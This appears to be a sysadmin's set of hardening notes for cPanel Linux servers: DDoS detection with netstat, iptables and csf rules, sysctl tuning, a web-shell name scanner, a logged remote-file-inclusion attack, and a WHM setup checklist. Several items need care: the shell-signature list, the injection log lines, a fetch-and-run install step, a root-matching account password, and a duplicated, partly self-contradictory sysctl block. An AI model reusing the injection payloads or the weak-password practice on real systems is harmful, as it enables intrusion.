iptables -I INPUT -s (allowip) -p tcp –dport (port) -j ACCEPT
iptables -A INPUT -s 0.0.0.0/24 -p tcp –dport (port) -j DROP
iptables -I INPUT -s (allowip) -p tcp –dport (port) -j ACCEPT
iptables -A INPUT -s 0.0.0.0/24 -p tcp –dport (port) -j DROP
1. Find.. to which IP address in the server is targeted by the ddos attack
netstat -plan | grep :80 | awk ‘{print $4}’ | cut -d: -f1 |sort |uniq -c
2. Find… from which IPs, the attack is coming
netstat -plan | grep :80 | awk ‘{print $5}’ | cut -d: -f1 |sort |uniq -c
In csf:
vi /etc/csf/csf.conf
SYNFLOOD
SYNFLOOD is disabled by default. If you are not receiving any sort of attack, there is no need to enable it. If you are expecting an attack, enable it and set the rules a bit strict, like
SYNFLOOD = “1”
SYNFLOOD_RATE = “30/s”
SYNFLOOD_BURST = “10”
i.e. if 30 connections are received from an IP/sec for 10 times, block it. Make sure don’t keep it too strict if you are not receiving an attack else it will generate false positives and will block legit connections.
PORTFLOOD
PORTFLOOD = 80;tcp;100;5,22;tcp;5;300
ie, If an IP makes 100 connections in 5 sec to port 80 (tcp), then it will be blocked from the server and if 5 connections in 300 sec to 22 port.
In /etc/sysctl.conf
Paste the following into the file, you can overwrite the current information.
#Kernel sysctl configuration file for Red Hat Linux
#
# For binary values, 0 is disabled, 1 is enabled. See sysctl(8) and
# sysctl.conf(5) for more details.
# Disables packet forwarding
net.ipv4.ip_forward=0
# Disables IP source routing
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.lo.accept_source_route = 0
net.ipv4.conf.eth0.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0
# Enable IP spoofing protection, turn on source route verification
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.lo.rp_filter = 1
net.ipv4.conf.eth0.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
# Disable ICMP Redirect Acceptance
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.lo.accept_redirects = 0
net.ipv4.conf.eth0.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
# Enable Log Spoofed Packets, Source Routed Packets, Redirect Packets
net.ipv4.conf.all.log_martians = 0
net.ipv4.conf.lo.log_martians = 0
net.ipv4.conf.eth0.log_martians = 0
# Disables IP source routing
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.lo.accept_source_route = 0
net.ipv4.conf.eth0.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0
# Enable IP spoofing protection, turn on source route verification
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.lo.rp_filter = 1
net.ipv4.conf.eth0.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
# Disable ICMP Redirect Acceptance
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.lo.accept_redirects = 0
net.ipv4.conf.eth0.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
# Disables the magic-sysrq key
kernel.sysrq = 0
# Decrease the time default value for tcp_fin_timeout connection
net.ipv4.tcp_fin_timeout = 15
# Decrease the time default value for tcp_keepalive_time connection
net.ipv4.tcp_keepalive_time = 1800
# Turn off the tcp_window_scaling
net.ipv4.tcp_window_scaling = 0
# Turn off the tcp_sack
net.ipv4.tcp_sack = 0
# Turn off the tcp_timestamps
net.ipv4.tcp_timestamps = 0
# Enable TCP SYN Cookie Protection
net.ipv4.tcp_syncookies = 1
# Enable ignoring broadcasts request
net.ipv4.icmp_echo_ignore_broadcasts = 1
# Enable bad error message Protection
net.ipv4.icmp_ignore_bogus_error_responses = 1
# Log Spoofed Packets, Source Routed Packets, Redirect Packets
net.ipv4.conf.all.log_martians = 1
# Increases the size of the socket queue (effectively, q0).
net.ipv4.tcp_max_syn_backlog = 1024
# Increase the tcp-time-wait buckets pool size
net.ipv4.tcp_max_tw_buckets = 1440000
# Allowed local port range
net.ipv4.ip_local_port_range = 16384 65536
Run /sbin/sysctl -p and sysctl -w net.ipv4.route.flush=1 to enable the changes without a reboot.
TCP Syncookies
echo 1 > /proc/sys/net/ipv4/tcp_syncookies
Some IPTABLES Rules:
iptables -A INPUT -p tcp –syn -m limit –limit 1/s –limit-burst 3 -j RETURN
To disable ping
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all
To enable ping
echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all
1. Enable SYN cookies mechanism in the server by the executing command:
# echo 1 > /proc/sys/net/ipv4/tcp_syncookies
2. Increase the backlog queue to 2048 by the command:
# sysctl -w net.ipv4.tcp_max_syn_backlog=”2048″
#!/bin/bash
# For some stupid reason, cPanel screws up the directory permissions.
chmod 755 /opt/suphp
find /opt/suphp -type d -exec chmod 755 {} \;
# Ensure that the permissions are sane and won’t cause a 500 error.
for user in `/bin/ls /var/cpanel/users`; do
chown -R ${user}:${user} /home/${user}/public_html
chmod 755 /home/${user}/public_html
find /home/${user}/public_html -name “*.php” -exec chmod 644 {} \;
find /home/${user}/public_html -type d -exec chmod 755 {} \;
# Comment out Joomla-installed PHP overrides that are not compatible with suPHP.
find /home/${user}/public_html -name ‘.htaccess’ -exec sed -i -e ‘s/php_value/#php_value/’ {} \;
find /home/${user}/public_html -name ‘.htaccess’ -exec sed -i -e ‘s/php_flag/#php_flag/’ {} \;
done
# Delete former session variables due to suPHP no longer having permission to them.
rm -rf /tmp/sess_*
#!/bin/bash
shellpattern=’r0nin|m0rtix|upl0ad|r57|c99|shellbot|phpshell|void\.ru|phpremoteview|directmail|bash_history|vulnscan|spymeta|raslan58′
for user in `/bin/ls /var/cpanel/users`
do
find /home/$user/public_html \( -name ‘*.php’ -o -name ‘*.cgi’ -o -name ‘*.inc’ \) -exec \
egrep -il “$shellpattern” {} \;
done
iptables -I INPUT -m iprange –src-range 192.168.1.10-192.168.1.13 -j DROP
URL Injection — attempt to inject / load files onto the server via PHP/CGI vulnerabilities
Sample log report including date and time stamp (1st field is “request”, 2nd field is the IP address or the domain name being attacked, and the 3rd field is the IP address or domain name of the attacker)
Request —– IP attacked —— IP of attacker
————————————————————————————————
Request: xxxx.com 111.222.333.444 – – [19/Apr/2009:08:35:02 -0500] “GET /?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1” 500 3572 “-” “Mozilla/5.0” SesohkAx1jYAAFNIEg0 “-”
Request: xxxx.com 111.222.333.444 – – [19/Apr/2009:08:35:03 -0500] “GET /fanzine/?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1” 500 3572 “-” “Mozilla/5.0” Sesoh0Ax1jYAAFN@Eng “-”
————————————————————————————————
1. Find.. to which IP address in the server is targeted by the ddos attack
netstat -plan | grep :80 | awk ‘{print $4}’ | cut -d: -f1 |sort |uniq -c
2. Find… from which IPs, the attack is coming
netstat -plan | grep :80 | awk ‘{print $5}’ | cut -d: -f1 |sort |uniq -c
3. Then find the TTL values of the attacking IP addresses
tcpdump -nn -vvv host xxxx |grep yyy (xxxx = ip attacking and yyyy = ip being attacked)
usually we need only tcpdump -nn -vvv host xxxx (as attack is coming from numerous ips)
4. Now block all the ips matching the TTL value obtained from the above script
iptables -A INPUT -p tcp -s 0.0.0.0/0 -d yyyy -m ttl –ttl-eq=zzz -j DROP (zzz is the ttl value)
——————————————————————————————————————-
Install mod security and dos evasive
——————————————————————————————————————-
Harden the sysctl parameters (kernel params) to mitigate the current attack.
Increasing the backlog queue size and decreasing the backlog queuing time might help a bit.
——————————————————————————————————————-
Also install an open source script to prevent DDoS attack to certain extend.
http://deflate.medialayer.com/
MediaLayer was in need of a script to automatically mitigate (D)DoS attacks. The necessity started when MediaLayer was the target of a rather large, consistent attack originating from multiple IP addresses. Each IP would have a large amount of connections to the server, as shown as by:
netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
It became a general practice for us to be blocking IPs with a large amount of connections, but we wanted to get this automated. Zaf created a script mitigate this kind of attack. We kept improving it to meet our own needs and eventually posted it on Defender Hosting’s Forum. (D)DoS-Deflate is now recognized as one of the best ways to block a (D)DoS attack at the software level.
You can view a copy of the license agreement here.
wget http://www.inetbase.com/scripts/ddos/install.sh chmod 0700 install.sh ./install.sh
wget http://www.inetbase.com/scripts/ddos/uninstall.ddos chmod 0700 uninstall.ddos ./uninstall.ddo
Reference : http://deflate.medialayer.com/
To preset a server:
First login and go to the WHM > Server Configuration > Basic cPanel/WHM
Setup:
1) Check that the main ip is the server primary ip
2) Make sure that the primary and secondary ns are set to ns1 and ns2 (or
how they had been prior to a reload)
**************************************************************************
Next go to WHM > Server Configuration > Tweak Settings:
Leave all the settings alone…ADD the following:
1) Under Domains: “Prevent users from parking/adding on common
internet domains. (ie hotmail.com, aol.com)”
2) Under Mail: “Attempt to prevent pop3 connection floods”
3) “Default catch-all/default address behavior for new accounts.” Select
‘fail’
4) “Email users when they have reached 80% of their bandwidth”
5) “Include a list of Pop before SMTP senders in the X-PopBeforeSMTP header
when relaying mail. (exim 4.34-30+ required)”
6) “Silently Discard all FormMail-clone requests with a bcc: header in the
subject line”
7) “Track the origin of messages sent though the mail server by adding the
X-Sender headers (exim 4.34+ required)”
Cool Under Software: “Loader to use for internal cPanel PHP” select
‘sourceguardian’
9) Under Status: “The load average that will cause the server status to
appear red (leave blank for default):” >> 5
10) Under System: “Allow Sharing Nameserver Ips”
11) “Use jailshell as the default shell for all new accounts and modified
accounts”
Click save at the bottom
**************************************************************************
Next, WHM > Server Configuration > Update Config:
1) Select ‘Automatic (RELEASE Tree)’
2) Verify that the cPanel Package Update and Security Package Update are
also set to ‘Automatic’
**************************************************************************
Next WHM > Security > Shell Fork Bomb Protection:
1) Enable Protection
**************************************************************************
Next, go to WHM > Security > Tweak Security please enable:
1) Php open_basedir Tweak
2) Compilers Tweak
3) SMTP Tweak
**************************************************************************
Next, WHM > Service Configuration:
1) Exim Configuration editor – enable Verify the existence of email senders
2) FTP configuration – Make sure Anonymous FTP is disabled
3) Nameserver Setup – Be sure that the nameserver is running
4) Service Manager – Check to monitor all EXCEPT the following:
Entropychat, Interchange, Melange, Tomcat and Exim on Another Port
**************************************************************************
Next, WHM > Cluster/Remote Access > Setup Remote Access Key:
1) Connect to SSH (if not already) and run the script:
pico /usr/local/cpanel/Cpanel/rvwhmkey
2) Copy/paste the key into the space provided, click ctrl x to exit, y to
save and hit enter to return to the prompt.
(NOTE: if there is no pico, an alternate method can be used: vi
/usr/local/cpanel/Cpanel/rvwhmkey; then press ‘i’ to insert text; paste
text; hit ‘esc’ to stop inserting text; press ‘:wq’ to save and exit- if you
need to exit without saving- ‘:q!’ will bring you back to prompt)
**************************************************************************
Next, back to WHM > Account Functions > Create a New Account:
1) Create an account with domain ‘rvadmin.com‘, username ‘rvadmin’ and
password of <same as root>
**************************************************************************
Next, WHM > System Health > Background Process Killer:
1) Click all open boxes and save.
**************************************************************************
Next, WHM > cPanel xx.xx.xx > Addon Modules:
1) Click on cPanel Pro, Clamavconnector, Modbandwidth, Modsecurity and
Addonupdates and click ‘save’ to install.
**************************************************************************
Next, WHM > cPanel xx.xx.xx > Addon Scripts:
1) Click all and click ‘save’ to install.
**************************************************************************
Next, WHM > Add-ons:
mod_security